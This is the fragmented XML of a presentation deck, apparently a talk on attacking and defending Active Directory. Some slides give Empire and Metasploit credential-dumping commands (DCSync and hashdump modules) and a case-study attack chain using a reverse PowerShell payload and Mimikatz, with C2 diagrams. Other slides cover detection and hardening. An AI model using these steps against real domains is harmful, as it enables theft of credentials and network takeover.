              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>usemodule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> credentials/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dcsync_hashdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p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8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Command &amp; Control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Simple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F70FD-D8F7-4E32-8150-5383EF3175F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F2A2AC06-47C4-4E25-AE97-8EBDFDC1A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890" y="1835689"/>
            <a:ext cx="1349879" cy="1349879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33555083-91A0-41AF-BB24-C4C197066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532" y="3213372"/>
            <a:ext cx="1349879" cy="1349879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Cloud 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B13E2599-9525-4EAF-8AF4-A1118E93EA3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6613864" y="3000414"/>
            <a:ext cx="2596796" cy="1758017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Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0960C439-0BEF-4E13-80CE-7AF424D7C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55" y="3492004"/>
            <a:ext cx="1038046" cy="11407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ED1E48-D78D-423A-B918-6E5B7DD2C170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7387552" y="3637460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B457D-A369-42A0-BE90-EE1E920925BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="137877" y="4448047"/>
            <a:ext cx="198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Attacker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72EC2-D6D5-42CA-B4E2-A458A4A2E67A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2580953" y="2985141"/>
            <a:ext cx="168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E040A-C48C-4676-AC1E-3467FEB2B256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10070237" y="4340326"/>
            <a:ext cx="198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Victim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AE1CDE-1653-4E16-BBC1-EF98913611BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1582272" y="2609757"/>
            <a:ext cx="872771" cy="121236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2542B1-4F87-4D5B-B875-7F95D94A2EE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3813769" y="2510629"/>
            <a:ext cx="3092485" cy="88813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7CDFCD-726B-4F1C-B6BF-6314912BDF4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flipH="1" flipV="1">
            <a:off x="9208496" y="3879423"/>
            <a:ext cx="918036" cy="8889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4D947B-2C1C-422C-9FBA-731D38F90A9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18299488">
            <a:off x="1595632" y="2866214"/>
            <a:ext cx="67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17693575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8C370F0-AEDC-4681-B548-1BC648AB16DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="166884" y="5625548"/>
            <a:ext cx="11205124" cy="140567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30734-B97B-44AB-8E09-3E6643FD1F5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DCSync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9091B-D684-44FB-9F52-0A9553F6BFB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5632174" y="6550223"/>
            <a:ext cx="6626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https://silentbreaksecurity.com/invoke-dcsync-because-we-all-wanted-it/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793AD-0E05-476E-A2FE-97F544D7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4" y="2730692"/>
            <a:ext cx="11962486" cy="31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470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017A9C-B2EB-4E21-A4B6-93C029BB5901}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260836" y="1620558"/>
            <a:ext cx="8369107" cy="44496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400" dirty="0"/>
              <a:t>If we logon to a Domain Controller we can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> the DC to retrieve all the Domain User hashes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>In Metasploit, from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t> on a DC:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt;run post/windows/gather/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>smart_hashdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0"/>
              <a:t>In Empire:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>usemodule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> credentials/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>powerdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&gt;execute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2E147-4012-4930-A50F-B28BE8FF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34" y="3679622"/>
            <a:ext cx="8128966" cy="31156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CA0CDCA-D008-4BBB-89CA-943202924475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Hashdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the DC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="497521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Case Study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F04346E-04C1-411C-B429-DE11F2712367}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390599" y="1429500"/>
            <a:ext cx="8608258" cy="49967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400" dirty="0"/>
              <a:t>Harvester for emails, sublist3r for domains.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> for a password brute force against Citrix server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Citrix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>exscape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>: Launch Word, use Open File and browse to cmd.exe then launch.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Generate reverse Powershell Empire payload and execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Query for domain admins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Query for domain controllers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Find Local Admin access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Run Bloodhound</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Find attack paths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on Local Admin machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Get new creds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Find new Local Admin access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Repeat until a path to DA opens up.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> with D.A. creds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0414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Detecting Attackers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591881" y="2004968"/>
            <a:ext cx="884093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For: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Sensitive Security Group Modifications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Lateral Movement ~ does Bob usually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> to 20 machines?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Domain Controller Promotions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Group Policy Modifications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Privileged Account Authentications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Account Lockouts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> masse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Failed Account Logins </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> masse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112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Winz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171310" y="1794930"/>
            <a:ext cx="88409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DAs- quit logging in! - don’t investigate with a DA account!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enable SMB Signing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get rid of Local Admin Password Reuse! ~ use LAPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable Local Admin account Remote Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overprivileged Domain User accounts, Local Admin everywhere??!?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service accts in DA group - backups, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>av</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change default creds on INTERNAL hosts - web servers, services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent storing/caching credentials ~~ will prevent domain accounts from logging in if you cant reach a DC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reduce Privileged Group members</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MFA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Segmentation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374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Cleanup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243032" y="2367195"/>
            <a:ext cx="1194896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STALE USER ACCOUNTS - no activity, no pass changes, never logged on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2800" dirty="0"/>
              <a:t>2. Overprivileged SERVICE ACCOUNTS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>3. NON-EXPIRING PASSWORDS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>. Domain admins, service accounts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35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Paid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393636" y="2700708"/>
            <a:ext cx="8840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things take longer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually have better alerting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why buy if you don’t implement?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Really need to be FULLY implemented to (properly) work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember kids, There is always a bypass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508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-3500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393636" y="644202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Auto-DA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D456EB-7A22-4F2A-88A0-021F1148C4EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1214733" y="2004968"/>
            <a:ext cx="102881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AngyPuppy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DeathStar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DogSpawn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DeathStar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     &gt; python / run alongside a modified version of empire / no bloodhound  &gt;&gt; auto DA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GoFetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        &gt; PowerShell / requires empire and a Bloodhound path exported as CSV     &gt;&gt; auto DA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AngryPuppy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> path exported as CSV + Cobalt Strike &gt;&gt; Auto DA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EmpireDog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   &gt; PowerShell module / vanilla Empire + vanilla </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt;&gt; auto what you want (but do it yourself...)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00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References!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485F7-C97F-40A5-9391-927529D5909C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276628" y="1666254"/>
            <a:ext cx="1129017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</a:rPr>
              <a:t>Command and General Infosec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://rmusser.net/docs/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/rmusser01/Infosec_Reference/tree/master/Draft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All things AD Security w/Emphasis on protection and detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://adsecurity.org/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F3903-C020-482F-87A1-E5B0BD0D61A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234441" y="3988004"/>
            <a:ext cx="11723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Powershell, AD, Random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https://blog.harmj0y.net/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https://docs.microsoft.com/en-us/advanced-threat-analytics/what-is-ata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7"/>
              </a:rPr>
              <a:t>http://www.labofapenetrationtester.com/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8"/>
              </a:rPr>
              <a:t>https://www.christophertruncer.com/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9"/>
              </a:rPr>
              <a:t>https://wald0.com/?p=112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10"/>
              </a:rPr>
              <a:t>https://blog.cptjesus.com/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11"/>
              </a:rPr>
              <a:t>https://posts.specterops.io/archive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12"/>
              </a:rPr>
              <a:t>http://www.exploit-monday.com/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681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References!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485F7-C97F-40A5-9391-927529D5909C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234441" y="1929142"/>
            <a:ext cx="117231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Tokens and ACL stuffs!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hlinkClick r:id="rId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https://secureidentity.se/acl-dacl-sacl-and-the-ace/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https://blogs.technet.microsoft.com/askds/2017/04/05/using-debugging-tools-to-find-token-and-session-leaks/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https://adsecurity.org/?page_id=1821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https://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/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http://www.itprotoday.com/security/understanding-process-tokens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7"/>
              </a:rPr>
              <a:t>https://raw.githubusercontent.com/hatRiot/token-priv/master/abusing_token_eop_1.0.txt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8"/>
              </a:rPr>
              <a:t>https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/amp/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9"/>
              </a:rPr>
              <a:t>https://www.blackhat.com/docs/eu-17/materials/eu-17-Thompson-Red-Team-Techniques-For-Evading-Bypassing-And-Disabling-MS-Advanced-Threat-Protection-And-Advanced-Threat-Analytics.pdf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10"/>
              </a:rPr>
              <a:t>https://foxglovesecurity.com/2016/01/16/hot-potato/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77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BEB848A-3F78-42C2-B984-C82B48AC4554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4062657" y="1917575"/>
            <a:ext cx="2225308" cy="4793855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/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0C6906-F43A-404D-A30E-9B2C28D7FA95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2370338" y="1917576"/>
            <a:ext cx="1555839" cy="4776251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/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Command &amp; Control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Better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F70FD-D8F7-4E32-8150-5383EF3175F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F2A2AC06-47C4-4E25-AE97-8EBDFDC1A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890" y="1835689"/>
            <a:ext cx="1349879" cy="1349879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33555083-91A0-41AF-BB24-C4C197066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532" y="3213372"/>
            <a:ext cx="1349879" cy="1349879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Cloud 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B13E2599-9525-4EAF-8AF4-A1118E93EA3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6613864" y="3000414"/>
            <a:ext cx="2596796" cy="1758017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Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0960C439-0BEF-4E13-80CE-7AF424D7C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055" y="3492004"/>
            <a:ext cx="1038046" cy="11407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ED1E48-D78D-423A-B918-6E5B7DD2C170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7387552" y="3637460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B457D-A369-42A0-BE90-EE1E920925BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="137877" y="4448047"/>
            <a:ext cx="198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Attacker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E040A-C48C-4676-AC1E-3467FEB2B256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10070237" y="4340326"/>
            <a:ext cx="198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Victim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AE1CDE-1653-4E16-BBC1-EF98913611BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1582272" y="2609757"/>
            <a:ext cx="872771" cy="121236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2542B1-4F87-4D5B-B875-7F95D94A2EE2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5255138" y="2638470"/>
            <a:ext cx="1651118" cy="76029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7CDFCD-726B-4F1C-B6BF-6314912BDF49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flipH="1" flipV="1">
            <a:off x="9208496" y="3879423"/>
            <a:ext cx="918036" cy="8889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Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F08DCE1-A459-4216-A1BA-D56DE2205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0738" y="2181270"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Graphic 25" descr="Wireless router">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87829FF9-3F85-467E-A41B-4EFD715E1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1656" y="3524977"/>
            <a:ext cx="914400" cy="914400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1238964F-E530-481C-825F-8C9D96847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197" y="3390555"/>
            <a:ext cx="1349879" cy="13498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56AC67E-9E81-4536-8C5A-AB36E411CB3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2627021" y="5905038"/>
            <a:ext cx="1012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C2s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1A1F5-A612-4D39-8855-1205363342CA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>
            <a:off x="1583101" y="4062359"/>
            <a:ext cx="906096" cy="313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EF0BB2-E964-46AB-897F-6776D777A931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834196" y="2540368"/>
            <a:ext cx="506542" cy="98102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441D37-3790-4A74-ADF8-E89256D5BCE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821328" y="3982177"/>
            <a:ext cx="540328" cy="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8A0C54-3473-4C43-B0BA-E734B2F5A70C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="15" idx="2"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5276056" y="3879423"/>
            <a:ext cx="1345863" cy="102754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08A326-8147-43E5-A18E-46B921D096C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3982540" y="5616610"/>
            <a:ext cx="2800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Domain Redirectors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293A5C-E834-44DC-9F6F-053CF2BE5F75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9566410" y="1331802"/>
            <a:ext cx="112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163EFA-FA5F-4EE9-85B4-CDFFF500FD1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9652117" y="1814488"/>
            <a:ext cx="94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SSH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A87B89F-C6C4-404B-8FC6-ACF1C90462C8}"/>
